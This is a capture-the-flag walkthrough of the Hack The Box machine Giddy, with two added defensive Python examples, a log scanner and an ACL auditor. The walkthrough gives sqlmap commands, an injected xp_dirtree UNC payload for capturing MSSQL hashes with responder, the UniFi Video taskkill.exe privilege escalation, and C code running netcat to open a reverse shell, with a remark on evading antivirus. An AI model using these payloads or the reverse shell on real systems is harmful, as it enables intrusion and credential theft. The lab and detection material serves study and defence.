HTB – Giddy Walkthrough

nmap

gobuster

Search field – SQL error

SQL Injection
You can use the PentestMonkey cheat sheet: http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
or you can use sqlmap:
sqlmap --url https://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=1 --dbms=mssql --dbs

databases

current user
sqlmap --url https://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=1 --dbms=mssql --current-user

Capture MSSQL credentials with xp_dirtree, smbserver.py
The following blog post explains the process very well: https://medium.com/@markmotig/how-to-capture-mssql-credentials-with-xp-dirtree-smbserver-py-5c29d852f478
=1; EXEC MASTER.sys.xp_dirtree '\\yourIP\something'

listen with responder to steal the user hash
responder -I tun0
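Both of the steps above, the sqlmap run against ProductSubCategoryId and the injected xp_dirtree call, pass through the web server and therefore show up in its access log. The following Python script is an added example and is not part of this walkthrough or of any tool it uses: it scans IIS-style access log lines for SQL metacharacters followed by a server error, a sqlmap user agent, and a UNC-capable extended procedure (xp_dirtree and its siblings xp_fileexist and xp_subdirs) combined with a \\host\share path, which is the signature of the credential-capture trick. The log lines, the simplified field layout and the client IP 10.10.14.5 are constructed for the example.

```python
"""Added example (not from the walkthrough): flag SQL-injection probes and
xp_dirtree-style UNC credential-capture attempts in web access log lines."""
import re
from urllib.parse import unquote_plus

# Constructed sample lines (IIS W3C-like, simplified to 8 fields):
# date time c-ip cs-method cs-uri-stem cs-uri-query cs(User-Agent) sc-status
SAMPLE_LOG = """\
2018-09-01 10:00:01 10.10.14.5 GET /mvc/Product.aspx ProductSubCategoryId=1 Mozilla/5.0 200
2018-09-01 10:00:07 10.10.14.5 GET /mvc/Product.aspx ProductSubCategoryId=1%27 Mozilla/5.0 500
2018-09-01 10:00:09 10.10.14.5 GET /mvc/Product.aspx ProductSubCategoryId=1%20AND%201=1 sqlmap/1.2.8 200
2018-09-01 10:00:30 10.10.14.5 GET /mvc/Product.aspx ProductSubCategoryId=1;EXEC%20master.sys.xp_dirtree%20%27%5C%5C10.10.14.5%5Cshare%27 Mozilla/5.0 200
2018-09-01 10:01:00 10.10.10.50 GET /mvc/Product.aspx ProductSubCategoryId=2 Mozilla/5.0 200
"""

# Extended procedures that take a path argument and follow UNC paths, making the
# SQL Server service account authenticate outbound over SMB.
UNC_PROCS = re.compile(r"\bxp_(dirtree|fileexist|subdirs)\b", re.IGNORECASE)
UNC_PATH = re.compile(r"\\\\[\w.\-]+\\")                     # \\host\share
SQLI_PROBE = re.compile(r"('|\bunion\b\s+select\b|\b(?:and|or)\b\s+\d+\s*=\s*\d+|--|;)", re.IGNORECASE)
SCANNER_UA = re.compile(r"sqlmap", re.IGNORECASE)


def parse_line(line):
    """Split one constructed log line into a dict; None if it is not 8 fields."""
    fields = line.split()
    if len(fields) != 8:
        return None
    _date, _time, client_ip, _method, stem, query, user_agent, status = fields
    return {"client_ip": client_ip, "stem": stem, "query": unquote_plus(query),
            "user_agent": user_agent, "status": int(status)}


def classify(entry):
    """Return the list of reasons an entry is suspicious (empty if none)."""
    reasons = []
    q = entry["query"]
    if UNC_PROCS.search(q) and UNC_PATH.search(q):
        reasons.append("UNC path passed to xp_dirtree-style procedure: outbound SMB auth from SQL service account")
    elif UNC_PROCS.search(q):
        reasons.append("UNC-capable extended procedure in query string")
    if SQLI_PROBE.search(q):
        reasons.append("SQL metacharacters in parameter")
        if entry["status"] >= 500:
            reasons.append("server error after SQL metacharacters (error-based injection signal)")
    if SCANNER_UA.search(entry["user_agent"]):
        reasons.append("sqlmap user agent")
    return reasons


def find_suspicious(log_text):
    """Scan a whole log and return hits as {line, client_ip, reasons}."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            hits.append({"line": n, "client_ip": entry["client_ip"], "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(hit)
```

The xp_dirtree match is the one worth alerting on, because it means the database service account is about to authenticate to an outside host over SMB. Blocking outbound TCP 445 from the database server and running the SQL Server service under a low-privilege account are the mitigations that make a captured hash worthless; the error-based signal (500 after a quote) is what an application-level fix with parameterised queries removes.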

Crack NTLM hash

/remote PowerShell login

Search for unifivideo on searchsploit

Exploit – Step by Step
Ubiquiti UniFi Video for Windows is installed to “C:\ProgramData\unifi-video\” by default and is also shipped with a service called “Ubiquiti UniFi Video”.

Its executable “avService.exe” is placed in the same directory and also runs under the NT AUTHORITY/SYSTEM account.

However, the default permissions on the “C:\ProgramData\unifi-video” folder are inherited from “C:\ProgramData” and are not explicitly overridden, which allows all users, even unprivileged ones, to append and write files to the application directory:
c:\ProgramData>icacls unifi-video

Upon start and stop of the service, it tries to load and execute the file at “C:\ProgramData\unifi-video\taskkill.exe”. However, this file does not exist in the application directory by default at all. By copying an arbitrary “taskkill.exe” to “C:\ProgramData\unifi-video\” as an unprivileged user, it is therefore possible to escalate privileges and execute arbitrary code as NT AUTHORITY/SYSTEM.
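The root cause described above is an ACL inherited from C:\ProgramData that lets BUILTIN\Users add files to a directory a SYSTEM service loads executables from. The following Python script is an added example, not code from this walkthrough or from the UniFi Video advisory: it parses icacls output for such a directory and reports every ACE that gives a low-privilege principal the ability to create or modify files there, alongside a hardened ACL that passes the check. Both icacls listings are constructed for the example, modelled on the stock C:\ProgramData permissions, and are not the output the page's own icacls command produced.

```python
"""Added example (not from the walkthrough or the advisory): audit icacls output
for write access granted to low-privilege principals on a service directory."""
import re

# Constructed icacls output for a folder that inherits the stock C:\ProgramData
# ACL; the (I) flag marks inherited ACEs. Not copied from the page.
ICACLS_OUTPUT = r"""
unifi-video NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
            BUILTIN\Administrators:(I)(OI)(CI)(F)
            CREATOR OWNER:(I)(OI)(CI)(IO)(F)
            BUILTIN\Users:(I)(OI)(CI)(RX)
            BUILTIN\Users:(I)(CI)(WD,AD,WEA,WA)

Successfully processed 1 files; Failed processing 0 files
"""

# Constructed output for the same folder after inheritance is disabled and the
# Users entry reduced to read/execute, i.e. what a fixed install should show.
HARDENED_OUTPUT = r"""
unifi-video NT AUTHORITY\SYSTEM:(OI)(CI)(F)
            BUILTIN\Administrators:(OI)(CI)(F)
            BUILTIN\Users:(OI)(CI)(RX)

Successfully processed 1 files; Failed processing 0 files
"""

# Principals every local user effectively belongs to.
LOW_PRIV = {"EVERYONE", "BUILTIN\\USERS", "NT AUTHORITY\\AUTHENTICATED USERS",
            "NT AUTHORITY\\INTERACTIVE"}
# Rights that allow dropping or replacing a file in the directory:
# F full, M modify, W write, WD write data / add file, AD append data / add subdirectory.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD"}
INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}


def parse_icacls(output, path):
    """Return one dict per ACE with principal, inheritance flags and rights."""
    aces = []
    for raw in output.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully"):
            continue
        if line.startswith(path + " "):           # only the first line carries the path
            line = line[len(path):].strip()
        principal, sep, rest = line.rpartition(":(")
        if not sep:
            continue
        tokens = []
        for group in re.findall(r"\(([^)]*)\)", "(" + rest):
            tokens.extend(group.split(","))       # "(WD,AD,WEA,WA)" -> four rights
        aces.append({
            "principal": principal,
            "flags": {t for t in tokens if t in INHERIT_FLAGS},
            "rights": {t for t in tokens if t not in INHERIT_FLAGS},
        })
    return aces


def weak_write_aces(output, path):
    """ACEs that let a low-privilege principal write into the directory itself."""
    findings = []
    for ace in parse_icacls(output, path):
        if ace["principal"].upper() not in LOW_PRIV:
            continue
        if "IO" in ace["flags"]:                  # inherit-only: not effective on this folder
            continue
        granted = sorted(ace["rights"] & WRITE_RIGHTS)
        if granted:
            findings.append({"principal": ace["principal"], "write_rights": granted,
                             "inherited": "I" in ace["flags"]})
    return findings


if __name__ == "__main__":
    print("inherited ACL:", weak_write_aces(ICACLS_OUTPUT, "unifi-video"))
    print("hardened ACL:", weak_write_aces(HARDENED_OUTPUT, "unifi-video"))
```

The `inherited` field is the detail that matters for remediation: an inherited ACE is fixed by breaking inheritance on the application folder and granting Users read/execute only, not by editing C:\ProgramData itself. The same check, fed with `icacls` output for every directory a service binary lives in, is a cheap periodic audit for this whole class of privilege escalation.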

Even when I encrypt the exploit, an AV probably catches it.

So I used the following C code to get a root shell:

/* windows-exp.c: the binary dropped as taskkill.exe; when the service runs it,
   it launches netcat to connect back to the listener */
#include <stdlib.h>

int main(void) {
    system("nc.exe -e cmd.exe <myip> <myport>");
    return 0;
}

# compile the C code with the mingw cross-compiler
i686-w64-mingw32-gcc windows-exp.c -lws2_32 -o exp.exe
Send taskkill.exe and nc.exe over SimpleHTTPServer

Stop the service

Wait for the Admin shell
